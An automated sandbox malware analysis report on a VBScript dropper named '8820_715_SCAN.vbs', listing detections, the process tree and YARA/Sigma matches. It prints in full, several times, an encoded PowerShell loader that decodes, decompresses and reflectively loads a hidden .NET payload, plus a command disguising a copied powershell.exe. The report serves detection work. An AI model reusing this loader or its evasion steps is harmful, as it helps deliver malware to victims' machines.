Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8820_715_SCAN.vbs

Overview

General Information

Sample name:8820_715_SCAN.vbs
Analysis ID:1572138
MD5:cbcdb57b4360abb35507b88bb5a7f2d7
SHA1:19d041d281f38b9c86542e0735037acf2638e860
SHA256:c8d8bf862a30647af9bf71da29e8c4aa74bdf383b6fbb6806227195b988923f9
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates processes via WMI
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6112 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6804 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 8820_715_SCAN.vbs.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: 8820_715_SCAN.vbs.exe PID: 6536INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x780743:$b2: ::FromBase64String(
  • 0x879ab:$s1: -join
  • 0x94a80:$s1: -join
  • 0x97e52:$s1: -join
  • 0x98504:$s1: -join
  • 0x99ff5:$s1: -join
  • 0x9c1fb:$s1: -join
  • 0x9ca22:$s1: -join
  • 0x9d292:$s1: -join
  • 0x9d9cd:$s1: -join
  • 0x9d9ff:$s1: -join
  • 0x9da47:$s1: -join
  • 0x9da66:$s1: -join
  • 0x9e2b6:$s1: -join
  • 0x9e432:$s1: -join
  • 0x9e4aa:$s1: -join
  • 0x9e53d:$s1: -join
  • 0x9e7a3:$s1: -join
  • 0xa0939:$s1: -join
  • 0xaf383:$s1: -join
  • 0xc4acb:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi32_6536.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x112:$b2: ::FromBase64String(
  • 0xaa8f:$s1: -join
  • 0x2ac:$s3: Reverse
  • 0x423b:$s4: +=
  • 0x42fd:$s4: +=
  • 0x8524:$s4: +=
  • 0xa641:$s4: +=
  • 0xa92b:$s4: +=
  • 0xaa71:$s4: +=
  • 0xc222:$s4: +=
  • 0xc2a2:$s4: +=
  • 0xc368:$s4: +=
  • 0xc3e8:$s4: +=
  • 0xc5be:$s4: +=
  • 0xc642:$s4: +=
  • 0x61:$e1: System.Diagnostics.Process
  • 0x22c0:$e4: Get-WmiObject
  • 0x24af:$e4: Get-Process
  • 0x2507:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==, CommandLine: "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUA
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", ProcessId: 6112, ProcessName: wscript.exe
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe, ProcessId: 6536, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qljaljk.p4c.ps1
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6112, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y, ProcessId: 6804, ProcessName: cmd.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs", ProcessId: 6112, ProcessName: wscript.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 8820_715_SCAN.vbsVirustotal: Detection: 14%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: Binary string: corlib.pdbHN9 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbS source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp, 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: 8820_715_SCAN.vbs.exe, 00000004.00000000.2083664847.0000000000651000.00000020.00000001.01000000.00000005.sdmp, 8820_715_SCAN.vbs.exe.2.dr
Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000000.2083664847.0000000000651000.00000020.00000001.01000000.00000005.sdmp, 8820_715_SCAN.vbs.exe.2.dr
Source: Binary string: System.Core.pdbk source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.0000000007810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb]b source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.00000000078A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.000000000785D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: 8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud

barindex
Malicious encrypted Powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe